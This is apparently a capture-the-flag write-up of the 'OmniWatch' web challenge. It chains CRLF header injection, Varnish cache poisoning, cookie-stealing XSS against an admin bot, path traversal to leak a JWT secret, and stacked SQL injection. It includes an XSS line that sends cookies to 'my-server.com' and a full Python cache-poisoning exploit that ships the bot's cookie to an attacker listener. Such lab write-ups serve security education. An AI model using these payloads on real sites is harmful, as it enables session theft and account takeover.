HackTheBox Business CTF: Vault Of Hope—OmniWatch CTF Writeup

Welcome back to another writeup! In this one, I'll walk you through how I solved OmniWatch, a Web Exploitation challenge from the HackTheBox Business CTF: Vault of Hope. This wasn't your typical web challenge. It was marked as hard, and it definitely lived up to the rating. From bypasses to digging deep into how the web app functioned, it threw several curveballs that required a mix of creativity, persistence, and a solid understanding of web internals. If you're into breaking the web (ethically, of course), sit tight, because this is going to be an interesting ride. Let's dive in!!

Challenge Description

The crew has uncovered the IP address of a web interface used by the mercenary group called "Gunners" to track and spy on their enemies. To locate an elusive black market dealer for a critical trade, the team must hack into this gunners network and retrieve the last known location of a caravan that was recently ambushed in the wasteland. This caravan's trail holds the key to finding the infamous black market seller, making the mission a high-stakes race against time to outwit the gunners and secure the vital information needed.

import time, schedule, threading

from application.app import app
from application.util.bot import run_scheduled_bot

def run_flask_app():
    app.run(host="0.0.0.0", port=3000, threaded=True, debug=False)


if __name__ == "__main__":
    schedule.every(0.5).minutes.do(run_scheduled_bot, app.config)

    flask_thread = threading.Thread(target=run_flask_app)
    flask_thread.start()

    while True:
        schedule.run_pending()
        time.sleep(1)

This entry point launches the Flask web application and a scheduled task side by side. The Flask server listens on port 3000 in its own thread, while run_scheduled_bot is scheduled to execute every 30 seconds (0.5 minutes). The main thread runs the scheduler loop, calling schedule.run_pending() and pausing for 1 second between each cycle.

Now let's check the bot.py

import time, random

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.options import Options

from application.util.database import MysqlInterface

def run_scheduled_bot(config):
        try:
                bot_runner(config)
        except Exception:
                mysql_interface = MysqlInterface(config)
                mysql_interface.update_bot_status("not_running")


def bot_runner(config):
        mysql_interface = MysqlInterface(config)
        mysql_interface.update_bot_status("running")

        chrome_options = Options()

        chrome_options.add_argument("headless")
        chrome_options.add_argument("no-sandbox")
        chrome_options.add_argument("ignore-certificate-errors")
        chrome_options.add_argument("disable-dev-shm-usage")
        chrome_options.add_argument("disable-infobars")
        chrome_options.add_argument("disable-background-networking")
        chrome_options.add_argument("disable-default-apps")
        chrome_options.add_argument("disable-extensions")
        chrome_options.add_argument("disable-gpu")
        chrome_options.add_argument("disable-sync")
        chrome_options.add_argument("disable-translate")
        chrome_options.add_argument("hide-scrollbars")
        chrome_options.add_argument("metrics-recording-only")
        chrome_options.add_argument("no-first-run")
        chrome_options.add_argument("safebrowsing-disable-auto-update")
        chrome_options.add_argument("media-cache-size=1")
        chrome_options.add_argument("disk-cache-size=1")

        client = webdriver.Chrome(options=chrome_options)

        client.get("http://127.0.0.1:1337/controller/login")

        time.sleep(3)
        client.find_element(By.ID, "username").send_keys(config["MODERATOR_USER"])
        client.find_element(By.ID, "password").send_keys(config["MODERATOR_PASSWORD"])
        client.execute_script("document.getElementById('login-btn').click()")
        time.sleep(3)

        client.get(f"http://127.0.0.1:1337/oracle/json/{str(random.randint(1, 15))}")

        time.sleep(10)

        mysql_interface.update_bot_status("not_running")
        client.quit()

This script defines a scheduled bot function that uses Selenium WebDriver with headless Chrome to automate browser interactions on the local web application. The bot logs in to the controller panel at http://127.0.0.1:1337/controller/login using the moderator credentials from the app config, waits, and then navigates to a random URL in the format http://127.0.0.1:1337/oracle/json/{1–15}, where it stays for 10 seconds. Throughout the process, it updates its running status in a MySQL database using a custom MysqlInterface class. Chrome is started headless with a long list of flags that strip unneeded features; note that no-sandbox actually disables Chrome's sandbox rather than hardening it. If any error occurs during the run, the bot resets its status in the database to "not_running".

How about the config.py

import os
from dotenv import load_dotenv

load_dotenv()

class Config(object):
        JWT_KEY = open("/app/jwt_secret.txt", "r").read()
        MYSQL_HOST = os.getenv("MYSQL_HOST")
        MYSQL_DATABASE = os.getenv("MYSQL_DATABASE")
        MYSQL_USER = os.getenv("MYSQL_USER")
        MYSQL_PASSWORD = os.getenv("MYSQL_PASSWORD")
        MODERATOR_USER = os.getenv("MODERATOR_USER")
        MODERATOR_PASSWORD = os.getenv("MODERATOR_PASSWORD")


class ProductionConfig(Config):
        pass


class DevelopmentConfig(Config):
        DEBUG = False


class TestingConfig(Config):
        TESTING = False

This code defines configuration settings for an application using environment variables and a secret key file. It starts by loading environment variables from a .env file using load_dotenv(). The Config class serves as the base configuration, reading the JWT secret key from a file (/app/jwt_secret.txt) and fetching MySQL credentials and moderator login details from environment variables. Three subclasses—ProductionConfig, DevelopmentConfig, and TestingConfig—inherit from Config, with DevelopmentConfig and TestingConfig each overriding or specifying their own debug-related flags. This structure allows the application to switch between different runtime environments with minimal changes.

Now let's check the endpoints routes.py

import sys, datetime, os
from flask import Blueprint, current_app, render_template, make_response, request, redirect

from application.util.general import response
from application.util.jwt import create_jwt, verify_jwt
from application.util.database import MysqlInterface

web = Blueprint("web", __name__)

def moderator_middleware(func):
        def check_moderator(*args, **kwargs):
                jwt_cookie = request.cookies.get("jwt")
                if not jwt_cookie:
                        return redirect("/controller/login")

                token = verify_jwt(jwt_cookie, current_app.config["JWT_KEY"])
                if not token:
                        return redirect("/controller/login")

                mysql_interface = MysqlInterface(current_app.config)

                user_id = token.get("user_id")
                account_type = token.get("account_type")
                signature = jwt_cookie.split(".")[-1]
                saved_signature = mysql_interface.fetch_signature(user_id)

                if not user_id or not account_type or not signature or not saved_signature or signature == "":
                        return redirect("/controller/login")

                if saved_signature != signature:
                        mysql_interface.delete_signature(user_id)
                        return redirect("/controller/login")

                if not account_type or account_type not in ["moderator", "administrator"]:
                        return redirect("/controller/login")

                request.user_data = token
                return func(*args, **kwargs)

        check_moderator.__name__ = func.__name__
        return check_moderator


def administrator_middleware(func):
        def check_moderator(*args, **kwargs):
                jwt_cookie = request.cookies.get("jwt")
                if not jwt_cookie:
                        return redirect("/controller/login")

                token = verify_jwt(jwt_cookie, current_app.config["JWT_KEY"])
                if not token:
                        return redirect("/controller/login")

                mysql_interface = MysqlInterface(current_app.config)

                user_id = token.get("user_id")
                account_type = token.get("account_type")
                signature = jwt_cookie.split(".")[-1]
                saved_signature = mysql_interface.fetch_signature(user_id)

                if not user_id or not account_type or not signature or not saved_signature or signature == "":
                        return redirect("/controller/login")

                if saved_signature != signature:
                        mysql_interface.delete_signature(user_id)
                        return redirect("/controller/login")

                if account_type != "administrator":
                        return redirect("/controller/home")

                request.user_data = token
                return func(*args, **kwargs)

        check_moderator.__name__ = func.__name__
        return check_moderator


@web.route("/", methods=["GET"])
def index():
        return redirect("/controller/home")


@web.route("/bot_running", methods=["GET"])
def bot_running():
        mysql_interface = MysqlInterface(current_app.config)
        bot_status = mysql_interface.fetch_bot_status()
        return bot_status


@web.route("/login", methods=["GET", "POST"])
def login():
        if request.method == "GET":
                return render_template("login.html", title="OmniWatch - Log-in")

        if request.method == "POST":
                username = request.form.get("username")
                password = request.form.get("password")

                if not username or not password:
                        return response("Missing parameters"), 400

                mysql_interface = MysqlInterface(current_app.config)
                user_valid = mysql_interface.check_user(username, password)

                if not user_valid:
                        return response("Invalid user or password"), 401

                user = mysql_interface.fetch_user_by_username(username)

                jwt_payload = {
                        "user_id": user["user_id"],
                        "username": username,
                        "account_type": user["permissions"]
                }

                jwt = create_jwt(jwt_payload, current_app.config["JWT_KEY"])
                mysql_interface.create_or_update_signature(user["user_id"], jwt.split(".")[-1])

                expiration_time = datetime.datetime.now() + datetime.timedelta(minutes=60)
                resp = make_response(redirect("/controller/home"))
                resp.set_cookie("jwt", jwt, expires=expiration_time)
                return resp, 302


@web.route("/logout", methods=["GET"])
@moderator_middleware
def logout():
        mysql_interface = MysqlInterface(current_app.config)
        mysql_interface.delete_signature(request.user_data.get("user_id"))
        resp = make_response(redirect("/controller/login"))
        resp.set_cookie("jwt", "", expires=0)
        return resp, 302


@web.route("/home", methods=["GET"])
@moderator_middleware
def home():
        mysql_interface = MysqlInterface(current_app.config)
        devices = mysql_interface.fetch_all_devices()
        return render_template("home.html", user_data=request.user_data, nav_enabled=True, title="OmniWatch - Home", devices=devices)


@web.route("/device/<id>", methods=["GET"])
@moderator_middleware
def device(id):
        mysql_interface = MysqlInterface(current_app.config)
        device = mysql_interface.fetch_device(id)

        if not device:
                return redirect("/controller/home")

        return render_template("device.html", user_data=request.user_data, nav_enabled=True, title=f"OmniWatch - Device {device['device_id']}", device=device)


@web.route("/firmware", methods=["GET", "POST"])
@moderator_middleware
def firmware():
        if request.method == "GET":
                patches_avaliable = ["CyberSpecter_v1.5_config.json", "StealthPatch_v2.0_config.json"]
                return render_template("firmware.html", user_data=request.user_data, nav_enabled=True, title="OmniWatch - Firmware", patches=patches_avaliable)

        if request.method == "POST":
                patch = request.form.get("patch")

                if not patch:
                        return response("Missing parameters"), 400

                file_data = open(os.path.join(os.getcwd(), "application", "firmware", patch)).read()
                return file_data, 200


@web.route("/admin", methods=["GET"])
@administrator_middleware
def admin():
        flag = os.popen("/readflag").read()
        return render_template("admin.html", user_data=request.user_data, nav_enabled=True, title="OmniWatch - Admin", flag=flag)

There's a lot going on here, so I'll explain it one middleware and one endpoint at a time!

Middleware: moderator_middleware

This function decorator ensures that only users with a valid jwt cookie and a role of either moderator or administrator can access protected routes. It validates the JWT, checks its signature against a stored one in the database to prevent session theft, and attaches user data to the request for later use. If any of these checks fail, the user is redirected to the login page.

Middleware: administrator_middleware

This is similar to the moderator middleware, but stricter. It only allows access if the user has the administrator role. If the JWT is invalid or the user is not an admin, they are either redirected to the login page or to /controller/home.

GET / → Redirect to Home

The root route (/) simply redirects users to /controller/home, serving as a default entry point to the controller panel.

GET /bot_running

This endpoint queries the bot’s current status from the database using MysqlInterface.fetch_bot_status() and returns it as plain text. It can be used to monitor whether the automated bot is currently running.

GET & POST /login

This handles both the login form display (GET) and login logic (POST). On POST, it verifies the username and password against the database. If valid, it generates a JWT, saves its signature for validation purposes, and sets it as a cookie. Users are then redirected to /controller/home.

GET /logout

Protected by moderator middleware, this logs the user out by deleting their saved JWT signature from the database and clearing the JWT cookie. The user is redirected to the login page.

GET /home

Also protected by moderator middleware, this is the main dashboard page. It fetches all IoT devices from the database and renders them on the home page, allowing moderators/admins to view them.

GET /device/<id>

This endpoint shows the detailed view of a specific device, based on the ID in the URL. If the device doesn't exist in the database, the user is redirected back to the home page. Only moderators and admins can access it.

GET & POST /firmware

This firmware manager page lists available firmware patches on GET. On POST, it takes the selected patch filename from the form and reads the corresponding file from disk, returning its content. This could be used to deploy or inspect firmware updates. Moderators and admins only.

GET /admin

This highly restricted admin-only page executes /readflag (likely a binary that outputs a secret/flag in CTF settings) and renders it in a web page. Only users with the administrator role and a valid JWT can access this endpoint.

TAKE NOTE OF THE ENDPOINTS

Now let's analyze the Zig service main.zig

const std = @import("std");
const httpz = @import("httpz");

const DefaultPrng = std.rand.DefaultPrng;
const Allocator = std.mem.Allocator;

var rand_impl = DefaultPrng.init(1);

pub fn main() !void {
    var gpa = std.heap.GeneralPurposeAllocator(.{}){};
    const allocator = gpa.allocator();
    const t1 = try std.Thread.spawn(.{}, start, .{allocator});
    t1.join();
}

pub fn start(allocator: Allocator) !void {
    var server = try httpz.Server().init(allocator, .{ .address = "0.0.0.0", .port = 4000 });
    defer server.deinit();
    var router = server.router();

    server.notFound(notFound);

    router.get("/oracle/:mode/:deviceId", oracle);
    try server.listen();
}

fn randomCoordinates() ![]const u8 {
    const strings = [_][]const u8{
        "37.8245", "-34.6037", "-122.4374", "-58.3816", "151.2093",
    };

    const randomIndex = @mod(rand_impl.random().int(u32), strings.len);
    const randomString = strings[randomIndex];
    return randomString;
}

fn oracle(req: *httpz.Request, res: *httpz.Response) !void {
    var gpa = std.heap.GeneralPurposeAllocator(.{}){};
    const allocator = gpa.allocator();

    const deviceId = req.param("deviceId").?;
    const mode = req.param("mode").?;
    const decodedDeviceId = try std.Uri.unescapeString(allocator, deviceId);
    const decodedMode = try std.Uri.unescapeString(allocator, mode);

    const latitude = try randomCoordinates();
    const longtitude = try randomCoordinates();

    res.header("X-Content-Type-Options", "nosniff");
    res.header("X-XSS-Protection", "1; mode=block");
    res.header("DeviceId", decodedDeviceId);

    if (std.mem.eql(u8, decodedMode, "json")) {
        try res.json(.{ .lat = latitude, .lon = longtitude }, .{});
    } else {
        const htmlTemplate =
            \\<!DOCTYPE html>
            \\<html>
            \\    <head>
            \\        <title>Device Oracle API v2.6</title>
            \\    </head>
            \\<body>
            \\    <p>Mode: {s}</p><p>Lat: {s}</p><p>Lon: {s}</p>
            \\</body>
            \\</html>
        ;

        res.body = try std.fmt.allocPrint(res.arena, htmlTemplate, .{ decodedMode, latitude, longtitude });
    }
}

fn notFound(_: *httpz.Request, res: *httpz.Response) !void {
    res.status = 404;
    res.body = "Not found";
}

This Zig program sets up a lightweight HTTP server using the httpz library, listening on port 4000. It defines a route /oracle/:mode/:deviceId that responds with either a JSON or an HTML payload containing randomly selected latitude and longitude coordinates, depending on the mode URL parameter. Both deviceId and mode are URL-decoded before use, and two details matter for the attack: the decoded deviceId is copied into a DeviceId response header, and in the HTML branch the decoded mode is formatted straight into the page body with no escaping. The response also sets the X-Content-Type-Options: nosniff and X-XSS-Protection headers, and the program includes a custom 404 handler for unmatched routes. The server is launched in a separate thread using Zig's threading system, and a global random number generator (seeded with 1) selects the coordinates from a static list.

While researching, I came across a discussion highlighting a CRLF injection vulnerability in http.zig.

It turns out that all route parameters in the application are susceptible to CRLF (Carriage Return Line Feed) injection, allowing an attacker to inject arbitrary HTTP headers, such as the Content-Type header, which is crucial for exploiting cross-site scripting (XSS) vulnerabilities. Although this CRLF issue has been patched in newer versions of the http.zig library, it's evident that the target application is still using an outdated and static version of the library. This suggests that http.zig was included manually in the codebase rather than being managed through a proper package manager that would facilitate version updates. Furthermore, by inspecting the file signatures within the challenge/oracle/modules directory, we can confirm that they align with the pre-patch versions of http.zig, validating that the vulnerable code is indeed present and exploitable.
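To make the CRLF idea concrete, here is a minimal Python sketch. It is not the http.zig code: naive_response is a hypothetical stand-in for any server that writes a decoded route parameter into a header without filtering \r\n, and the injected header values are only examples.

```python
from urllib.parse import quote, unquote


def naive_response(device_id_param: str) -> str:
    """Hypothetical server: writes the decoded parameter into a header verbatim."""
    decoded = unquote(device_id_param)  # plays the role of std.Uri.unescapeString
    return (
        "HTTP/1.1 200 OK\r\n"
        "X-Content-Type-Options: nosniff\r\n"
        f"DeviceId: {decoded}\r\n"
        "\r\n"
        "<p>body</p>"
    )


# Attacker-controlled deviceId: a normal value followed by two smuggled headers.
injected = "1\r\nCacheKey: enable\r\nContent-Type: text/html"
raw = naive_response(quote(injected, safe=""))

# Split the header block the way a client would (status line dropped).
head = raw.split("\r\n\r\n", 1)[0]
headers = dict(line.split(": ", 1) for line in head.split("\r\n")[1:])
print(headers)
```

The parsed result contains CacheKey and Content-Type as if the server had set them itself, which is exactly what the later steps rely on.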

Let's validate if we can actually do some XSS

It's official! Now that we've confirmed the XSS vulnerability, what's the next step to exploit it?

Let's take a look at the cache.vcl

vcl 4.0;

backend default1 {
    .host = "127.0.0.1";
    .port = "3000";
}

backend default2 {
    .host = "127.0.0.1";
    .port = "4000";
}

sub vcl_hash {
    hash_data(req.http.CacheKey);
    return (lookup);
}

sub vcl_synth {
    if (resp.status == 301) {
        set resp.http.Location = req.http.Location;
        set resp.status = 301;
        return (deliver);
    }
}

sub vcl_recv {
    if (req.url ~ "^/controller/home"){
        set req.backend_hint = default1;
        if (req.http.Cookie) {
            return (hash);
        }
    } else if (req.url ~ "^/controller") {
        set req.backend_hint = default1;
    } else if (req.url ~ "^/oracle") {
        set req.backend_hint = default2;
    } else {
        set req.http.Location = "/controller";
        return (synth(301, "Moved"));
    }
}

sub vcl_backend_response {
    if (beresp.http.CacheKey == "enable") {
        set beresp.ttl = 10s;
        set beresp.http.Cache-Control = "public, max-age=10";
    } else {
        set beresp.ttl = 0s;
        set beresp.http.Cache-Control = "public, max-age=0";
    }
}

sub vcl_deliver {
    if (obj.hits > 0) {
        set resp.http.X-Cache = "HIT";
    } else {
        set resp.http.X-Cache = "MISS";
    }

    set resp.http.X-Cache-Hits = obj.hits;
}

I will keep it short. In this VCL configuration, vcl_hash determines how the cache key is generated, and it uses only the request's CacheKey header: the URL and Host never enter the hash. vcl_backend_response defines the caching policy: if the backend response carries a CacheKey header equal to "enable", the response is cached for 10 seconds; otherwise, it isn't cached. So vcl_hash decides which cache entry a request maps to, and vcl_backend_response decides whether a response gets stored at all. Because the CacheKey header is the sole component of the cache key, requests for different URLs can map to the same entry, and since the CRLF bug lets us inject arbitrary response headers, this opens the door to cache poisoning.

When we inject headers such as Content-Type or X-Content-Type-Options together with a CacheKey: enable header, and place an XSS payload in the mode parameter, Varnish caches the malicious response for 10 seconds. Any subsequent request that maps to the same cache key receives the poisoned response, even when it asks for a different URL. The root cause is that the cache key is built from a single header and ignores the URL.
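The collision can be illustrated with a toy model in Python. This is only a sketch of the two subroutines shown above (vcl_hash and vcl_backend_response); it ignores everything else Varnish does, and TinyCache, backend and the "evil" URL are hypothetical names made up for the example.

```python
class TinyCache:
    """Toy cache: the key is the request's CacheKey header only, the URL is ignored."""

    def __init__(self):
        self.store = {}

    def fetch(self, url, req_headers, backend, now):
        key = req_headers.get("CacheKey", "")  # vcl_hash: hash_data(req.http.CacheKey)
        entry = self.store.get(key)
        if entry and entry[1] > now:
            return entry[0], "HIT"
        body, resp_headers = backend(url)
        if resp_headers.get("CacheKey") == "enable":  # vcl_backend_response
            self.store[key] = (body, now + 10)  # ttl = 10s
        return body, "MISS"


def backend(url):
    # Hypothetical backend: the attacker's URL yields a response with CacheKey: enable.
    if "evil" in url:
        return "<script>/* attacker */</script>", {"CacheKey": "enable"}
    return '{"lat": "37.8245"}', {}


cache = TinyCache()
first = cache.fetch("/oracle/evil/1", {}, backend, now=0)    # attacker poisons
victim = cache.fetch("/oracle/json/7", {}, backend, now=5)   # different URL, same key
later = cache.fetch("/oracle/json/7", {}, backend, now=11)   # entry has expired
print(first[1], victim, later)
```

The victim asks for /oracle/json/7 but is served the attacker's body, because neither request sent a CacheKey header and both therefore hash to the same key.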

Race Condition via Chromium Bot

We attempted to exploit our findings by targeting the bot that runs every 30 seconds, but it didn't succeed.

When we attempt to poison the cache with the payload:

<script>fetch("http://my-server.com/exfiltrate?cookies="+document.cookie)</script>

We get a request without any cookies.

Why? Let's revisit the bot.py

client.get("http://127.0.0.1:1337/controller/login")

time.sleep(3)
client.find_element(By.ID, "username").send_keys(config["MODERATOR_USER"])
client.find_element(By.ID, "password").send_keys(config["MODERATOR_PASSWORD"])
client.execute_script("document.getElementById('login-btn').click()")
time.sleep(3)

client.get(f"http://127.0.0.1:1337/oracle/json/{str(random.randint(1, 15))}")

time.sleep(10)

mysql_interface.update_bot_status("not_running")
client.quit()

The bot starts by accessing the login page, pauses for 3 seconds, submits the login credentials, waits another 3 seconds, and then navigates to a randomly chosen device page within the oracle service. If we cache-poison the oracle endpoint before the login process, the bot hasn't received any cookies yet, so there's nothing to steal. Plus, if it gets served our cached malicious page early, it won't see the login form at all, causing the entire login attempt to break. To succeed, we need to time our cache poisoning precisely, right after the login completes, but before the bot hits the oracle endpoint.
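As a rough model of that window, the sketch below uses only the sleep values from bot.py and the 10-second TTL from cache.vcl. It assumes page loads are instantaneous, which is not true in practice, so treat the numbers as approximate; poison_lands_in_window is a hypothetical helper.

```python
LOGIN_WAIT = 3       # time.sleep(3) before the bot submits the login form
POST_LOGIN_WAIT = 3  # time.sleep(3) after the bot clicks login
CACHE_TTL = 10       # beresp.ttl in cache.vcl


def poison_lands_in_window(poison_at: float) -> bool:
    """poison_at: seconds after the bot opened the login page (load times ignored)."""
    login_submitted = LOGIN_WAIT
    oracle_visit = LOGIN_WAIT + POST_LOGIN_WAIT
    after_login = poison_at > login_submitted
    before_oracle = poison_at < oracle_visit
    still_cached = oracle_visit < poison_at + CACHE_TTL
    return after_login and before_oracle and still_cached


for t in (1, 4, 7):
    print(t, poison_lands_in_window(t))
```

Under these assumptions, a poison request sent about 4 seconds in falls inside the window, while one sent at 1 second (before login) or 7 seconds (after the oracle visit) does not.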

I attempt to visit the bot_running endpoint

Because the /controller/bot_running endpoint reveals the bot’s current status, we can use it to roughly track its activity and aim to inject the cache-poisoning payload around 3 seconds after the bot begins running.

import time
import urllib.parse
import requests

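TARGET_HOST = ""          # challenge host (fill in)
TARGET_PORT = "<PORT>"    # challenge port (placeholder, fill in)
BASE_URL = f"http://{TARGET_HOST}:{TARGET_PORT}"

EXFIL_HOST = ""           # your listener host (fill in)
EXFIL_PORT = "<PORT>"     # your listener port (placeholder, fill in)
EXFIL_ENDPOINT = f"http://{EXFIL_HOST}:{EXFIL_PORT}"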

def encode_for_url(raw_str):
    """Encodes a string to be safely used in a URL."""
    return urllib.parse.quote(raw_str, safe="")

def is_bot_active():
    """Checks if the challenge bot is currently running."""
    response = requests.get(f"{BASE_URL}/controller/bot_running")
    is_running = response.text.strip() == "running"
    print(f"[*] Bot status check: {'ACTIVE' if is_running else 'INACTIVE'}")
    return is_running

def inject_xss_payload():
    """Attempts to inject an XSS payload into the cache if bot is running."""
    if not is_bot_active():
        print("[-] Bot is not active. Waiting for next attempt...")
        return False

    print("[+] Bot is active! Preparing to inject XSS payload after delay...")
    time.sleep(3)

    payload_script = f"<script>fetch('{EXFIL_ENDPOINT}/jwt/'+btoa(document.cookie))</script>"
    print(f"[+] XSS JavaScript Payload: {payload_script}")

    encoded_payload = encode_for_url(payload_script)
    print(f"[+] Encoded Payload: {encoded_payload}")

    malicious_headers = "\r\nCacheKey: enable\r\nX-Content-Type-Options: undefined"
    print("[+] Crafting injected headers:")
    print("    Raw:     " + malicious_headers.replace("\r\n", "\\r\\n"))
    encoded_headers = encode_for_url(malicious_headers)
    print("    Encoded: " + encoded_headers)

    target_url = f"{BASE_URL}/oracle/{encoded_payload}/1{encoded_headers}"
    print(f"[+] Sending request to: {target_url}")

    try:
        requests.get(target_url)
        print("[+] Cache poisoning attempt completed.")
    except Exception as e:
        print(f"[!] Error during injection: {e}")

def monitor_and_attack():
    """Continuously monitors and injects the cache when bot is active."""
    print("[*] Monitoring bot status. Waiting for window of opportunity...")
    while True:
        inject_xss_payload()
        time.sleep(1)

def entrypoint():
    """Script entrypoint."""
    monitor_and_attack()

if __name__ == "__main__":
    entrypoint()

This is the output

And my server received this

It worked!!! Now let's decode that base64 and it should give us the jwt token

Now let's add this JWT token

Reload and change the /login endpoint to /admin

We're now admin!!!

We now have admin, now what? You think the flag is here? Hell nah, XD!! We're not done yet.

Leak JWT secret via LFI

As you can see in the dashboard, we're admin right? But technically, we're NOT!

If we decode the JWT token, this is the result
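If you'd rather decode it locally than use an online tool, a small sketch like the following works. It only base64-decodes the payload segment and does not verify the signature; the sample token is the moderator token that appears later in this writeup.

```python
import base64
import json


def decode_jwt_payload(token: str) -> dict:
    """Decode the payload (middle) segment of a JWT without verifying it."""
    payload_b64 = token.split(".")[1]
    padded = payload_b64 + "=" * (-len(payload_b64) % 4)  # restore stripped padding
    return json.loads(base64.urlsafe_b64decode(padded))


sample = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6Ijk4MjRmOWMxNTQzNjI4YTg1YmI1MWQyZGQ2ZmNmOGEzIiwiYWNjb3VudF90eXBlIjoibW9kZXJhdG9yIn0."
    "BKksNigs_z9erSl5ZN1PsQb5V7Or1UwsxkNQK76tt1c"
)
claims = decode_jwt_payload(sample)
print(claims["user_id"], claims["account_type"])
```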

We are moderator, not the admin.

Since we are moderator, let's take a look at the features of the dashboard.

While exploring the dashboard, I headed over to the Firmware section, which brought up a firmware update interface. It displays two available firmware files that we can inspect or preview. Picking one shows the contents of the selected file.

Let's revisit the firmware function in routes.py

@web.route("/firmware", methods=["GET", "POST"])
@moderator_middleware
def firmware():
        if request.method == "GET":
                patches_avaliable = ["CyberSpecter_v1.5_config.json", "StealthPatch_v2.0_config.json"]
                return render_template("firmware.html", user_data=request.user_data, nav_enabled=True, title="OmniWatch - Firmware", patches=patches_avaliable)

        if request.method == "POST":
                patch = request.form.get("patch")

                if not patch:
                        return response("Missing parameters"), 400

                file_data = open(os.path.join(os.getcwd(), "application", "firmware", patch)).read()
                return file_data, 200

Examining the code, we observe that the file selected for preview is sent as a POST parameter (patch) from the frontend, and os.path.join is used to construct the full file path with no validation. This gives us an arbitrary file read (referred to here as LFI): if any later argument to os.path.join is an absolute path, Python discards everything before it and uses only the absolute path, and relative ../ sequences aren't filtered either.
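The os.path.join behaviour is easy to check in isolation. The sketch below uses posixpath (what os.path is on Linux) so it behaves the same everywhere, and it assumes the app's working directory is /app, which is a guess based on the /app/jwt_secret.txt path in config.py.

```python
import posixpath  # os.path on Linux; used directly so the demo is platform-independent

# Assumed base directory: os.getcwd() is taken to be /app for this illustration.
base = posixpath.join("/app", "application", "firmware")

normal = posixpath.join(base, "StealthPatch_v2.0_config.json")
absolute = posixpath.join(base, "/app/jwt_secret.txt")
relative = posixpath.normpath(posixpath.join(base, "../../jwt_secret.txt"))

print(normal)    # /app/application/firmware/StealthPatch_v2.0_config.json
print(absolute)  # /app/jwt_secret.txt
print(relative)  # /app/jwt_secret.txt
```

Both the absolute path and the ../ variant escape the firmware directory, so either form in the patch parameter should reach the same file.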

What I did was fire up Burp Suite to intercept the firmware request

Note that the host changed here because the server instance stopped and I had to repeat the earlier steps, haha

Now if we go back to config.py, we can see the full path of jwt_secret.txt. Changing the patch parameter to that path gives us the content of jwt_secret.txt.

MX'!J^rHl

SQL Injection to insert custom signature

We’ve successfully leaked the JWT secret. However, keep in mind that the authentication middleware includes tamper protection, so simply crafting a new JWT with the leaked secret won’t let us authenticate. The only viable bypass would be inserting a custom signature directly into the database.
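The tamper protection can be modelled in a few lines. This is a simplified sketch of the comparison done in the middleware shown earlier: a plain dict stands in for the signatures table, check_token is a hypothetical name, and the token strings are dummies.

```python
def check_token(token: str, user_id: int, signatures: dict) -> bool:
    """Simplified mirror of the middleware's signature comparison."""
    signature = token.split(".")[-1]
    saved = signatures.get(user_id)
    if not signature or not saved:
        return False
    if saved != signature:
        signatures.pop(user_id, None)  # the middleware calls delete_signature(user_id)
        return False
    return True


forged = "header.payload.forged-signature"

# Case 1: the DB still holds the moderator's signature, so the forged token is rejected.
db_before = {1: "moderator-signature"}
rejected = check_token(forged, 1, db_before)

# Case 2: the stored signature has been replaced with ours, so the same token passes.
db_after = {1: "forged-signature"}
accepted = check_token(forged, 1, db_after)

print(rejected, db_before, accepted)
```

One side effect worth noticing: a mismatch deletes the stored row, so presenting the forged token too early would wipe the moderator's session. The signature has to be written to the database first.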

Let's revisit the routes again

@web.route("/device/<id>", methods=["GET"])
@moderator_middleware
def device(id):
	mysql_interface = MysqlInterface(current_app.config)
	device = mysql_interface.fetch_device(id)
	
	if not device:
		return redirect("/controller/home")

	return render_template("device.html", user_data=request.user_data, nav_enabled=True, title=f"OmniWatch - Device {device['device_id']}", device=device)

At the /controller/device/<id> endpoint, a new MysqlInterface object is initialized, and its fetch_device method is invoked using the given id as the argument.

Let's take a look at the fetch_device function in database.py

def fetch_device(self, device_id):
    query = f"SELECT * FROM devices WHERE device_id = '{device_id}'"
    device = self.query(query, multi=True)[0][0]
    return device

The device_id is interpolated straight into the query string with an f-string. After analyzing database.py thoroughly, I confirmed that this is vulnerable to SQL injection

def query(self, query, args=(), one=False, multi=False):
    cursor = self.connection.cursor()
    results = None

    if not multi:
        cursor.execute(query, args)
        rv = [dict((cursor.description[idx][0], value)
            for idx, value in enumerate(row)) for row in cursor.fetchall()]
        results = (rv[0] if rv else None) if one else rv
    else:
        results = []
        queries = query.split(";")
        for statement in queries:
            cursor.execute(statement, args)
            rv = [dict((cursor.description[idx][0], value)
                for idx, value in enumerate(row)) for row in cursor.fetchall()]
            results.append((rv[0] if rv else None) if one else rv)
            self.connection.commit()

    return results

The query method reveals that it's possible to perform a stacked query injection by including a semicolon (;) in the input payload.
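To see what the split does to a malicious id, here is a small sketch that repeats only the string handling from fetch_device and query, with no database involved. The 0x41 value is a placeholder, not the real signature.

```python
def build_statements(device_id: str) -> list:
    """Repeat the f-string interpolation and the split(';') from database.py."""
    query = f"SELECT * FROM devices WHERE device_id = '{device_id}'"
    return query.split(";")


# Placeholder payload: closes the quote, stacks an UPDATE, comments out the rest.
statements = build_statements("';UPDATE signatures SET signature = 0x41 WHERE user_id = 1#")
for statement in statements:
    print(repr(statement))
```

The first statement is a harmless SELECT with an empty id, and the second is our UPDATE, with the trailing quote swallowed by the # comment.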

Generating the JWT token and injecting a crafted signature into the database

Since we know the JWT secret, we can use it to create a JWT token as administrator.

import jwt

def create_admin_token(secret_key):
    user_data = dict(
        user_id=1,
        username="lean",
        account_type="administrator"
    )
    
    token = jwt.encode(user_data, key=secret_key, algorithm="HS256")
    return token

secret = "secret_key_here"
print(create_admin_token(secret))

This is the result

The signature is the last part of the token (As you can see the token is separated by dots.)
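For reference, this is roughly where that last segment comes from. The sketch below rebuilds an HS256 token with only the standard library, as an illustration of the format rather than a replacement for the PyJWT call above; sign_hs256 and b64url are hypothetical helper names, and "secret_key_here" is the same placeholder used earlier.

```python
import base64
import hashlib
import hmac
import json


def b64url(data: bytes) -> str:
    """URL-safe base64 without padding, as used in JWT segments."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def sign_hs256(payload: dict, secret: str) -> str:
    header = {"alg": "HS256", "typ": "JWT"}
    segments = [
        b64url(json.dumps(header, separators=(",", ":")).encode()),
        b64url(json.dumps(payload, separators=(",", ":")).encode()),
    ]
    signing_input = ".".join(segments).encode()
    digest = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
    return ".".join(segments + [b64url(digest)])


token = sign_hs256(
    {"user_id": 1, "username": "lean", "account_type": "administrator"},
    "secret_key_here",  # placeholder secret
)
header_b64, payload_b64, signature = token.split(".")
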